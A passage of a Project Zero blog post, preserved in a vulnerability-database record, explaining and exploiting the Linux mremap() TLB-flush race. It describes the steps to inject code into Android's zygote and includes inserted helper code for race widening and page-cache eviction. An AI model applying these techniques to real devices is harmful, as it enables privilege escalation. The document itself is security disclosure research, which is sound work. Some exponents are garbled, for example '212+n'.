operations on all places across the system where a given file is mapped, like an ftruncate() syscall that shrinks a file and frees pages beyond the new end of the file) don't hold the mmap_sem and only use page table locks.\n\nThe mremap() syscall allows userspace to move a VMA and its associated page table entries. This syscall moves page tables via mremap_to() -> move_vma() -> move_page_tables() -> move_ptes(). The move_ptes() function implemented roughly the following logic for moving entries between two L1 page tables, with only the mmap_sem held initially (locked in exclusive mode):\n\n 1. (Take reverse map locks in some cases if the new VMA has been merged into an adjacent VMA.)\n\n 2. Take page table locks on the old and new page tables.\n\n 3. (Do a TLB flush if the direct reclaim path is in the middle of stealing some pages from the current process.)\n\n 4. For each non-empty entry in the relevant range of the current source page table:\n\n    a. Atomically read the current value of the page table entry and clear it (using ptep_get_and_clear(), which e.g. on X86 boils down to a LOCK XCHG).\n\n    b. If the read page table entry is Dirty, set the local force_flush flag to true.\n\n    c. Write the read page table entry into the page table for the new mapping.\n\n 5. Unlock the new page table.\n\n 6. If the force_flush flag was set, perform a TLB flush on the old page table entries that were accessed in step 4.\n\n 7. Unlock the old page table.\n\n 8. (Drop reverse map locks if they were taken.)\n\n 9. If the force_flush flag wasn't set, signal to the caller move_page_tables() that a TLB flush is required.\n\nLater, after iterating over multiple page tables, move_page_tables() then performs a TLB flush on the old address range if requested. \n\nmove_ptes() needs to ensure that, when it releases the old page table's reference, there can be no more stale TLB entries. 
There is nothing in move_ptes() that explicitly drops a reference, but move_ptes() moves the reference into the new page table entry. While the page table locks on the new page table are held, other tasks running concurrently can't yet remove the new page table entry and drop its reference, so things are still fine after step 4c - the page can't be freed. But after step 5, another task can theoretically race with mremap() and drop the page. This is long before move_page_tables() performs the relevant TLB flush on the old address range (this is the bug I reported), and also slightly before the TLB flush is performed in the force_flush case (I didn't notice that, but the kernel security team did).\n\nOn modern kernels, the big race window only works for non-Dirty page table entries - in other words, the big race window can only be used for use-after-free reads, not use-after-free writes. However, before [commit 5d1904204c99](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5d1904204c99>) (from November 2016, first in v4.9), the special case for Dirty page table entries did not exist, and the big race window was also usable for use-after-free writes.\n\nAlmost everyone is using kernel versions >=4.9 nowadays - for example, [Debian stable ships a kernel based on 4.9](<https://packages.debian.org/search?suite=stretch&searchon=names&keywords=linux-image-amd64>). But there are some exceptions: RHEL [still ships 3.10-based kernels](<https://access.redhat.com/articles/3078>), and many Android devices are based on kernels older than 4.9. 
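
The ordering error described above, as an added example that is a toy model written for this page and not Linux code: a tiny MMU with a page table as the source of truth and a TLB that caches translations, a move_pte that either publishes the new PTE before flushing the old translation (the move_ptes() ordering) or flushes first (the remove-flush-drop pattern from the previous section), and a racing task that behaves like ftruncate(), unmapping and freeing the frame using only the page table. The frame is then handed out again, and a read through the old virtual page goes through the stale TLB entry to the new owner's data. All names (frames, translate, move_pte_buggy, concurrent_truncate, run_scenario) and the frame contents are this example's own.

```c
/* Added example, not kernel code: a toy page table + TLB model showing why
 * freeing a page before the cross-core TLB flush is a use-after-free.
 * Frames hold 16 bytes of "data"; names and values are constructed. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define NFRAMES  8
#define NVPNS    8
#define TLB_SIZE 4

static char frames[NFRAMES][16];   /* physical memory */
static bool frame_free[NFRAMES];
static int  page_table[NVPNS];     /* vpn -> pfn, -1 if unmapped */

struct tlb_entry { int vpn, pfn; bool valid; };
static struct tlb_entry tlb[TLB_SIZE];

static void mmu_reset(void) {
    memset(frames, 0, sizeof frames);
    for (int i = 0; i < NFRAMES; i++) frame_free[i] = true;
    for (int i = 0; i < NVPNS; i++) page_table[i] = -1;
    memset(tlb, 0, sizeof tlb);
}

/* Translate like hardware: TLB hit first, else walk the page table and
 * cache the result. Returns -1 on a page fault. */
static int translate(int vpn) {
    for (int i = 0; i < TLB_SIZE; i++)
        if (tlb[i].valid && tlb[i].vpn == vpn) return tlb[i].pfn;
    int pfn = page_table[vpn];
    if (pfn < 0) return -1;
    tlb[vpn % TLB_SIZE] = (struct tlb_entry){ vpn, pfn, true };  /* toy placement */
    return pfn;
}

static void tlb_flush_vpn(int vpn) {
    for (int i = 0; i < TLB_SIZE; i++)
        if (tlb[i].valid && tlb[i].vpn == vpn) tlb[i].valid = false;
}

static int alloc_frame(void) {
    for (int i = 0; i < NFRAMES; i++)
        if (frame_free[i]) { frame_free[i] = false; return i; }
    return -1;
}

/* Step 4 of move_ptes(): take the old PTE and install it at new_vpn.
 * Buggy ordering: the new PTE is published (another task can now free the
 * page) while the TLB still translates old_vpn. Fixed ordering: flush the
 * old translation before the page can become someone else's. */
static void move_pte_buggy(int old_vpn, int new_vpn) {
    int pfn = page_table[old_vpn]; page_table[old_vpn] = -1;
    page_table[new_vpn] = pfn;
}
static void move_pte_fixed(int old_vpn, int new_vpn) {
    int pfn = page_table[old_vpn]; page_table[old_vpn] = -1;
    tlb_flush_vpn(old_vpn);
    page_table[new_vpn] = pfn;
}

/* The racing task: like ftruncate(), it only consults the page table, so it
 * flushes the mapping it removes and knows nothing about old_vpn. */
static void concurrent_truncate(int vpn) {
    int pfn = page_table[vpn];
    page_table[vpn] = -1;
    tlb_flush_vpn(vpn);
    frame_free[pfn] = true;
}

/* Returns what a read through old_vpn sees after the frame was freed and
 * reused, or "" if the read faults (the correct outcome). */
const char *run_scenario(bool fixed) {
    mmu_reset();
    int old_vpn = 1, new_vpn = 5;
    int pfn = alloc_frame();
    page_table[old_vpn] = pfn;
    strcpy(frames[pfn], "attacker");
    translate(old_vpn);                     /* a memory access fills the TLB */

    if (fixed) move_pte_fixed(old_vpn, new_vpn);
    else       move_pte_buggy(old_vpn, new_vpn);

    concurrent_truncate(new_vpn);           /* race window: frame back to allocator */
    int victim = alloc_frame();             /* reuse, e.g. page cache fill for a victim file */
    strcpy(frames[victim], "victim-page");

    int seen = translate(old_vpn);
    return seen < 0 ? "" : frames[seen];
}

int main(void) {
    printf("buggy ordering, read via old vpn: \"%s\"\n", run_scenario(false));
    printf("fixed ordering, read via old vpn: \"%s\"\n", run_scenario(true));
    return 0;
}
```

The model collapses all cores into one TLB; on real hardware the flush in move_pte_fixed is the IPI-driven cross-core shootdown described in the previous section, which is exactly the expensive step that batching tries to defer.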
For example, the kernel branches used by Google's Pixel phones are:\n\n * Google Pixel: 3.18\n\n * Google Pixel 2: 4.4\n\n * Google Pixel 3: 4.9\n\nI decided to write an exploit for Google's Pixel 2.\n\n## Locks and preemption\n\nThis section, along with the following one, describes some background that will be useful for developing an exploit strategy.\n\nThe Linux kernel supports three different models for preemption of kernel code, one of which has to be selected at build time:\n\n * CONFIG_PREEMPT_NONE (\"No Forced Preemption (Server)\")\n\n * CONFIG_PREEMPT_VOLUNTARY (\"Voluntary Kernel Preemption (Desktop)\")\n\n * CONFIG_PREEMPT (\"Preemptible Kernel (Low-Latency Desktop)\")\n\n(More preemption types [are coming](<https://www.youtube.com/watch?v=BxJm-Ujipcg>) with the realtime patchset, but that hasn't landed yet.)\n\nThe preemption model determines what happens when the kernel wishes to interrupt a task that is currently running kernel code - e.g. because a task with higher priority has become runnable and is waiting to be scheduled.\n\nThe Pixel 2 uses a kernel configured with CONFIG_PREEMPT. This means that by default, kernel code can be interrupted at any point during its execution. This even works while a task is holding a mutex, while it is holding a semaphore, or while it is in an RCU read-side critical section (depending on kernel configuration). Only something like a spinlock actually suppresses preemption.\n\nAs an attacker, we would like to make the race window between the time move_ptes() drops the page table lock and the time the TLB flush occurs in move_page_tables() as big as possible. 
Here, it is very useful for us that kernel code is preemptible: Because only the mmap_sem is held across the race window, and the mmap_sem does not inhibit preemption, we can potentially convince the scheduler to kick the task off the CPU core while it is in the middle of the race window, and then keep the task off the CPU for an amount of time on the order of milliseconds.\n\nThe kernel allows us to set the affinity of our tasks (the list of CPU cores on which a task is allowed to run), and it also allows us to set various scheduler parameters that control the relative priority of our tasks. This means that we can use affinity masks to pin multiple processes we own together onto a single CPU core, with different priorities - meaning that waking up the higher-priority task implies preemption of the lower-priority one. In this case, by assigning the SCHED_IDLE priority to the task running mremap(), pinning it together with a task that has normal priority and is blocking on a read() from a pipe, and then writing to the other side of that pipe in the right moment, we can preempt the mremap() syscall.\n\nTo know the right moment for calling write() on the other end of the pipe, we can abuse procfs. The procfs file /proc/<pid>/status contains various fields about the memory use of a process, including the VmPTE field, which shows the amount of memory consumed by the page tables of a process. By busy-polling the status file and monitoring the VmPTE field, it is possible to detect the page table allocations performed by the mremap() syscall.\n\n## The page allocator\n\nThe Linux page allocator is based on a [buddy allocator](<https://en.wikipedia.org/wiki/Buddy_memory_allocation>), implemented in [mm/page_alloc.c](<https://elixir.bootlin.com/linux/latest/source/mm/page_alloc.c>). 
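
The userspace side of the preemption trick from the previous section, as an added example that is not the original post's exploit code: parse_vmpte() pulls the VmPTE field out of /proc/<pid>/status text, pte_grew() is the trigger condition for the pipe write, and pin_and_deprioritize() applies the single-CPU affinity and SCHED_IDLE policy with the standard Linux sched_setaffinity(2)/sched_setscheduler(2) calls. The status-file contents below are constructed sample input, the process name in them is made up, and the function names are this example's own.

```c
/* Added example, not from the post: detect mremap()'s page-table allocation
 * by polling VmPTE, and set up the affinity/priority arrangement so that a
 * pipe write preempts the mremap() task. Sample status text is constructed. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef __linux__
#include <sched.h>
#include <unistd.h>
#endif

/* Return VmPTE in kB from the text of /proc/<pid>/status, or -1 if absent. */
long parse_vmpte(const char *status_text) {
    const char *p = strstr(status_text, "VmPTE:");
    if (!p) return -1;
    return strtol(p + 6, NULL, 10);   /* "VmPTE:\t   56 kB" -> 56 */
}

/* Read VmPTE of pid via procfs; -1 on error. */
long read_vmpte(int pid) {
    char path[64], buf[4096];
    snprintf(path, sizeof path, "/proc/%d/status", pid);
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return parse_vmpte(buf);
}

/* Trigger condition: page-table memory grew past the baseline taken before
 * mremap() was issued, i.e. move_page_tables() has allocated a page table. */
int pte_grew(long baseline_kb, long current_kb) {
    return baseline_kb >= 0 && current_kb > baseline_kb;
}

#ifdef __linux__
/* Pin pid to one CPU and drop it to SCHED_IDLE, so that a normal-priority
 * task pinned to the same CPU preempts it as soon as it becomes runnable.
 * Returns 0 on success, -1 on failure (errno set by the syscall). */
int pin_and_deprioritize(pid_t pid, int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    if (sched_setaffinity(pid, sizeof set, &set) != 0) return -1;
    struct sched_param sp = { .sched_priority = 0 };
    return sched_setscheduler(pid, SCHED_IDLE, &sp) == 0 ? 0 : -1;
}
#endif

/* Constructed samples of the relevant lines, before and after mremap()
 * allocated a page table. */
static const char sample_before[] =
    "Name:\tmremap-victim\nVmRSS:\t    1204 kB\nVmPTE:\t      56 kB\nThreads:\t1\n";
static const char sample_after[] =
    "Name:\tmremap-victim\nVmRSS:\t    1204 kB\nVmPTE:\t      60 kB\nThreads:\t1\n";

int main(void) {
    long before = parse_vmpte(sample_before);
    long after  = parse_vmpte(sample_after);
    printf("VmPTE %ld kB -> %ld kB, trigger=%d\n", before, after, pte_grew(before, after));
    /* Live usage: take the baseline with read_vmpte(victim_pid), have the
     * normal-priority task block in read() on a pipe, busy-poll until
     * pte_grew() fires, then write(2) one byte into the pipe. */
    return 0;
}
```

Note that the polling task must itself not be pinned to the victim's CPU with SCHED_IDLE, or it would never get to observe the change; it is the pipe reader, not the poller, that has to share the core with the mremap() task.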
This allocator tracks free pages of different orders; an order-n page is 212+n bytes big and is aligned to a 212+n-byte boundary (assuming that the system is using a native page size of 212 bytes).\n\n** \n**\n\nPage freelists are not just per-order, but also per-zone, per-migration-type and (on NUMA systems, which isn't relevant for Android phones) per-node.\n\n** \n**\n\nThe zone specifies in which ways a page can be used; pages stay associated with a single zone. The following zones can exist; bold text indicates that the zone actually exists on the Pixel 2:\n\n** \n**\n\n * ZONE_DMA: like ZONE_NORMAL, but can also be used for DMA with devices that can only address a small subset of physical memory (used by arm64 before kernel 4.16)\n\n * ZONE_DMA32: like ZONE_NORMAL, but can also be used for DMA with devices that can only use 32-bit physical addresses (used by arm64 since kernel 4.16)\n\n * ZONE_NORMAL: can be used for normal kernel memory allocations and as userspace memory; page is mapped in the linear mapping\n\n * ZONE_HIGHMEM: Can only be used for special types of kernel memory allocations and as userspace memory; page is not mapped in the linear mapping. 
This doesn't exist on arm64, since virtual memory is large enough to map all physical memory.\n\n * ZONE_MOVABLE: manually reserved for pages that the kernel can (usually) move to a different physical address when needed (basically, userspace memory); this [enables limited memory hotplugging](<https://events.static.linuxfound.org/sites/events/files/lcjp13_ishimatsu.pdf>) and [reduces fragmentation (which can help with the allocation of hugepages)](<https://lwn.net/Articles/219589/>); the Pixel 2 doesn't seem to be using this\n\n * ZONE_DEVICE: [something about persistent memory?](<https://lwn.net/Articles/717555/>) \\- arm64 never uses this\n\n** \n** \n\n\nThe migration type of a page specifies either what kind of allocation the page is currently being used for (if the page is currently in use) or what kind of allocation the page should preferably be used for (if the page is free); the intent is to cluster pages that the kernel can reclaim by moving their contents together, allowing the kernel to later create high-order free pages by moving data out of the way. The following migration types exist:\n\n** \n**\n\n * MIGRATE_UNMOVABLE: for allocations that can't simply be removed from their physical page whenever the kernel wants to have the page for something else - e.g. normal kmalloc() allocations\n\n * MIGRATE_MOVABLE: for data that the kernel can (usually) simply move to another physical page - e.g. 
userspace memory\n\n * MIGRATE_RECLAIMABLE: for allocations that the kernel can't simply move to a different address, but that the kernel can free if necessary to free up some memory\n\n * MIGRATE_HIGHATOMIC: [something about memory reserves for high-order page allocator calls that shouldn't fail but also can't wait for pages to be freed?](<https://lwn.net/Articles/658081/>)\n\n * MIGRATE_CMA: [special memory reserves for contiguous memory for DMA](<https://lwn.net/Articles/486301/>), can only be used for specific DMA allocations and for movable allocations\n\n * MIGRATE_ISOLATE: no allocations are possible - used for purposes like memory hot-removal and blacklisting of defective RAM at runtime\n\n** \n**\n\nThe first two or three of these are the most relevant ones - the rest are kinda special.\n\n** \n**\n\nThe page allocator also has per-cpu, per-zone, per-migratetype freelists as a performance optimization. These only contain order-0 pages. In kernel versions <4.15, one annoying thing about the per-cpu freelists is that they can be accessed from both sides. Normal freelist accesses push and pop on the same end so that pages coming from the freelist are more likely to be in the CPU cache; but when freeing pages that are expected to be cache-cold, and when allocating pages that have to wait for DMA before they are written to the first time, old kernel versions access the freelist from the other end.\n\n** \n**\n\nThe algorithm for allocating pages via get_page_from_freelist(), before entering the slowpath, works roughly as follows (ignoring things like NUMA and atomic/realtime allocations):\n\n** \n**\n\n * For each zone (from the most preferred zone to the least preferred zone); in other words, on the Pixel 2, when allocating non-DMA memory, first for ZONE_NORMAL, then for ZONE_DMA:\n\n * rmqueue_pcplist(): If we want an order-0 page, attempt to allocate from the per-cpu freelist for the current zone and our preferred migratetype. 
If this freelist is empty, try to refill it by looking through the per-order freelists for the current zone and our preferred migratetype, starting at order 0, iterating through the freelists with increasing order (standard buddy allocator behavior).\n\n * Attempt to allocate from the buddy allocator directly, by iterating through the per-order freelists for the current zone and our preferred migratetype with increasing order.\n\n * If we want a movable page, attempt to allocate from MIGRATE_CMA memory instead.\n\n * __rmqueue_fallback(): Tries to grab a free block of maximum order from a freelist with a different migration type, then potentially changes that block's migration type to the desired one.\n\n** \n**\n\nFor an attacker attempting to exploit a use-after-free at the page allocator level, this means that getting the kernel to reallocate a movable page for an unmovable allocation, or the other way around, requires creating memory pressure that forces the buddy allocator to go through __rmqueue_fallback() and steal pages from a different migration type.\n\n## Exploit strategy\n\nFor exploiting the TLB invalidation race, we want to quickly reallocate the freed movable page from the page cache. Preferably we'll do this through a per-cpu freelist, so it is probably easier to have it reallocated as a movable page instead of forcing a migratetype change. With this strategy, we can't attack things like normal kernel memory allocations or page tables, but we can attack the page cache and anonymous userspace memory. I chose to poison page cache memory, since I wanted to avoid having other userspace processes in the critical timing path of the attack.\n\n** \n**\n\nThis means that at a high level, to perform the attack, we need to pick a victim file page (in other words, a page-aligned and page-sized area in a file) that we want to corrupt, in a file to which we have read-only access (e.g. a shared library containing executable code). 
Next, we need to poison the page cache entry for the victim file page by running roughly the following steps in a loop:

 1. Somehow evict the victim file page from the page cache.

 2. Allocate a set of file-backed pages (e.g. by writing to a memfd), and map them as mapping A.

 3. Trigger the mremap/ftruncate race to free the file-backed pages without removing the corresponding TLB entries for mapping A.

 4. Start a read from the victim page, causing the kernel to reallocate one of the freed pages as the page cache entry for the victim page.

 5. Poll the contents of the pages in mapping A (through the stale TLB entries) until one of them contains the victim page's data. If a page fault occurs before that (meaning the stale TLB entry has been lost), go back to step 1.

 6. At this point, we have a stale TLB entry translating the old mapping A to the victim page. Therefore, we can now repeatedly overwrite the victim page through mapping A. (In theory, it seems like a single overwrite should be sufficient; but in practice, that doesn't seem to work.
I'm not sure whether this is caused by some sort of cache inconsistency (because memory is concurrently written via DMA and by software), or whether I did something else wrong.)

On kernels <4.15, because of the annoying two-sided behavior of the per-cpu freelist, when a new physical page is allocated to store the victim page, it comes from the "cold" end of the per-cpu freelist; so instead of simply pushing a page with a stale TLB entry onto the per-cpu freelist and letting the kernel use it for the victim page, it is necessary to quickly push enough pages with stale TLB entries to force the kernel to move all existing per-cpu freelist entries to the global freelist.

## Forcing page cache reloads

This section focuses on the first step of the exploit strategy, evicting the victim page from the page cache.

Public prior research on this topic that I used for my PoC is [https://arxiv.org/abs/1710.00551](<https://arxiv.org/abs/1710.00551>) ("Another Flip in the Wall of Rowhammer Defenses"), which uses page cache eviction as a mechanism to repeatedly move file-backed pages to different physical pages. This paper says in section VIII-B:

"A fundamental observation we made is that the replacement algorithm of the Linux page cache prioritizes eviction of nonexecutable pages over executable pages."

In shrink_active_list() and page_check_references() in mm/vmscan.c, you can see that file-backed executable pages indeed get special handling:

```c
static void shrink_active_list(unsigned long nr_to_scan,
			       struct lruvec *lruvec,
			       struct scan_control *sc,
			       enum lru_list lru)
{
	[...]
		/*
		 * Identify referenced, file-backed active pages and
		 * give them one more trip around the active list. So
		 * that executable code get better chances to stay in
		 * memory under moderate memory pressure.  Anon pages
		 * are not likely to be evicted by use-once streaming
		 * IO, plus JVM can create lots of anon VM_EXEC pages,
		 * so we ignore them here.
		 */
		if ((vm_flags & VM_EXEC) && page_is_file_cache(page)) {
			list_add(&page->lru, &l_active);
			continue;
		}
	[...]
}

[...]

static enum page_references page_check_references(struct page *page,
						  struct scan_control *sc)
{
	[...]
		/*
		 * Activate file-backed executable pages after first usage.
		 */
		if (vm_flags & VM_EXEC)
			return PAGEREF_ACTIVATE;

		return PAGEREF_KEEP;
	[...]
}
```

Therefore, executable file-backed pages are used to create memory pressure to evict the victim page: since the victim page is itself executable code, an eviction set made of non-executable pages would be reclaimed before the victim page is.

For this attack, it is also desirable that the victim page, once evicted, is not reloaded from disk until it is accessed the next time. This is not always the case: The kernel has some readahead logic that, depending on the observed memory access pattern, may read large amounts of data (up to VM_MAX_READAHEAD, which is 128KiB) around a page fault from disk. This is implemented in filemap_fault() by calling into do_async_mmap_readahead() / do_sync_mmap_readahead(). An attacking process can simply opt out of this for its own accesses (with MADV_RANDOM), but it is also desirable to suppress this behavior for accesses coming from other processes that might be executing code from other pages in the victim file.

For this reason, the PoC first evicts the victim page, then accesses all other pages in the victim file through a mapping with MADV_RANDOM to reduce the probability that accesses to those other pages trigger readahead logic: When a page being accessed is present in RAM, synchronous readahead won't happen; and when the page being accessed with a minor fault (i.e.
the page is present in the page cache, but no corresponding page table entry exists yet) is not marked as PG_readahead, asynchronous readahead won't happen either.

## Picking a victim page

My exploit targets a victim page in the library /system/lib64/libandroid_runtime.so that contains the function com_android_internal_os_Zygote_nativeForkAndSpecialize(). This function is executed in the context of the zygote process whenever an app process needs to be launched. In other words, it shouldn't run very often on an idle device, meaning that we can evict it and then have time to trigger the bug; and we can trigger its execution by launching an isolated service, so we can easily cause its execution immediately after successfully triggering the bug. The zygote process has the CAP_SYS_ADMIN capability (and is permitted to use it), and because its job is to fork off children that become app processes and system_server, it has access to the contexts of system_server and every app.

To demonstrate that the code injection into the zygote is working, the injected code reads its own SELinux context and then overwrites the hostname with that string (using sethostname()).

## Putting it together

The exploit is packaged in an app that, when you press the "run" button, first uses the code in eviction.c to flush the victim page in /system/lib64/libandroid_runtime.so from the page cache; afterwards, the code in sched_test.c is used to trigger the mremap bug and overwrite the victim page.
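As an added illustration of the page-cache side of what eviction.c has to deal with (this is example code written for this page, not the PoC's eviction.c, and it deliberately leaves out the executable-page memory pressure that does the actual evicting), the following Linux C program checks which pages of a file are currently in the page cache with mincore() and pre-faults every page of the file except the victim through a MADV_RANDOM mapping, the readahead-suppression step described above. The sample file is constructed in /tmp; the victim index is a parameter.

```c
/* Added example: page cache residency via mincore() and MADV_RANDOM priming
 * of all non-victim pages. Linux-only; not the PoC's code. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

static size_t file_pages(int fd) {
    struct stat st;
    if (fstat(fd, &st) < 0) return 0;
    long ps = sysconf(_SC_PAGESIZE);
    return (size_t)((st.st_size + ps - 1) / ps);
}

/* Number of pages of fd that are in the page cache right now, or -1.
 * Caveat: since Linux 5.2, mincore() only reports real residency for files
 * the caller owns or may write; for other files every page reads as resident,
 * a mitigation aimed at page-cache side channels like the eviction used here. */
long resident_pages(int fd) {
    size_t n = file_pages(fd);
    if (!n) return -1;
    long ps = sysconf(_SC_PAGESIZE);
    void *m = mmap(NULL, n * ps, PROT_READ, MAP_SHARED, fd, 0);
    if (m == MAP_FAILED) return -1;
    unsigned char *vec = calloc(n, 1);
    long resident = -1;
    if (vec && mincore(m, n * ps, vec) == 0) {
        resident = 0;
        for (size_t i = 0; i < n; i++) resident += vec[i] & 1;
    }
    free(vec);
    munmap(m, n * ps);
    return resident;
}

/* Touch every page of fd except 'victim' through a MADV_RANDOM mapping.
 * MADV_RANDOM makes filemap_fault() skip readahead for our own accesses, and
 * once the other pages are resident, faults on them from other processes
 * don't start synchronous readahead that could pull the victim back in.
 * Returns the number of pages touched, or -1. */
long prime_except(int fd, size_t victim) {
    size_t n = file_pages(fd);
    if (!n || victim >= n) return -1;
    long ps = sysconf(_SC_PAGESIZE);
    volatile unsigned char *m = mmap(NULL, n * ps, PROT_READ, MAP_SHARED, fd, 0);
    if ((void *)m == MAP_FAILED) return -1;
    if (madvise((void *)m, n * ps, MADV_RANDOM) != 0) {
        munmap((void *)m, n * ps);
        return -1;
    }
    long touched = 0;
    for (size_t i = 0; i < n; i++) {
        if (i == victim) continue;
        (void)m[i * ps];          /* volatile read forces the fault */
        touched++;
    }
    munmap((void *)m, n * ps);
    return touched;
}

/* Constructed sample input: an unlinked temp file of 'npages' pages, each
 * filled with its own index byte. Returns the open fd or -1. */
int make_sample_file(size_t npages) {
    char path[] = "/tmp/victim-XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    unlink(path);                 /* the fd keeps the inode alive */
    long ps = sysconf(_SC_PAGESIZE);
    unsigned char *buf = malloc(ps);
    if (!buf) { close(fd); return -1; }
    for (size_t i = 0; i < npages; i++) {
        memset(buf, (int)i, ps);
        if (write(fd, buf, ps) != ps) { free(buf); close(fd); return -1; }
    }
    free(buf);
    return fd;
}

int main(void) {
    int fd = make_sample_file(8);
    if (fd < 0) return 1;
    printf("resident after write: %ld of 8 pages\n", resident_pages(fd));
    printf("primed %ld pages around victim page 3\n", prime_except(fd, 3));
    close(fd);
    return 0;
}
```

Right after the file is written all eight pages are resident, and priming with victim index 3 touches the other seven. Evicting the victim in the real attack is a separate step: posix_fadvise(POSIX_FADV_DONTNEED) only drops clean, unmapped pages of files you hold open, so for a library page mapped by the zygote it is no substitute for the memory pressure the PoC generates.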
If sched_test.c reports that it has successfully located and overwritten the targeted code page, the Java code launches the isolated app TriggerService to trigger execution of com_android_internal_os_Zygote_nativeForkAndSpecialize(); otherwise, the attack is restarted.

sched_test.c executes the following threads:

 * idle_worker(): on core 4, with SCHED_IDLE priority; is moved to core 3 during the attack

 * spinner(): on core 4, with normal priority

 * nicer_spinner(): on core 3, with normal priority

 * read_worker(): on core 5, with normal priority

 * main(): on core 6, with normal priority

The following screenshot shows the running exploit, which has performed a few exploit attempts already, but hasn't managed to visibly trigger the bug yet:

[screenshot: exploit running, no visible trigger yet]

In the next screenshot, the exploit has managed to read data through the stale TLB entry, but still hasn't managed to locate and overwrite the victim page:

[screenshot: data read through the stale TLB entry, victim page not yet located]

In the third screenshot, the exploit has succeeded:

[screenshot: exploit succeeded]

## Timeline

This bug [was reported](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1695>) to the Linux kernel on 2018-10-12.

A fix [was committed and made public](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=eb66ae030829605d61fbef1909ce310e29f78821>) six days later, on 2018-10-18.

Two days after that, on 2018-10-20, new upstream stable kernels were released on the branches [4.9](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.9.135>), [4.14](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.78>) and [4.18](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.16>).

On 2018-10-29, we [published](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1695#c4>) the bug report.

On 2018-11-10, an upstream backport on the 4.4 branch was [released](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.163>).

On 2018-11-14,
we [published](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1695#c5>) the exploit described in this blogpost.

It took more than two months for the upstream kernel change to make its way to user devices; writing an exploit for this bug took far less time.

# Conclusion

There isn't really an overarching conclusion here, but some takeaways:

 * Bugs in TLB flushing logic can be exploitable and lead to system compromise from unprivileged userspace.

 * When trying to exploit a use-after-free of a physical page on Linux, keep in mind that the page allocator will try to avoid changing the migration types of pages, so usually movable pages (anonymous userspace memory and page cache) will be reused as movable pages, and unmovable pages (normal kernel memory) will be reused as unmovable pages.

 * Knowing a bit about the scheduler, and in particular preemption, can be very helpful for widening kernel race windows. Linux exposes fairly powerful control over scheduling to unprivileged userspace.

 * Android takes months to ship an upstream kernel security fix to users; it would be nice if that was significantly faster.
", "modified": "2019-01-17T00:00:00", "published": "2019-01-17T00:00:00", "id": "GOOGLEPROJECTZERO:60F2E118E85CB34AAEEAED9DE88D51AF", "href": "https://googleprojectzero.blogspot.com/2019/01/taking-page-from-kernels-book-tlb-issue.html", "type": "googleprojectzero", "title": "\nTaking a page from the kernel's book: A TLB issue in mremap()\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}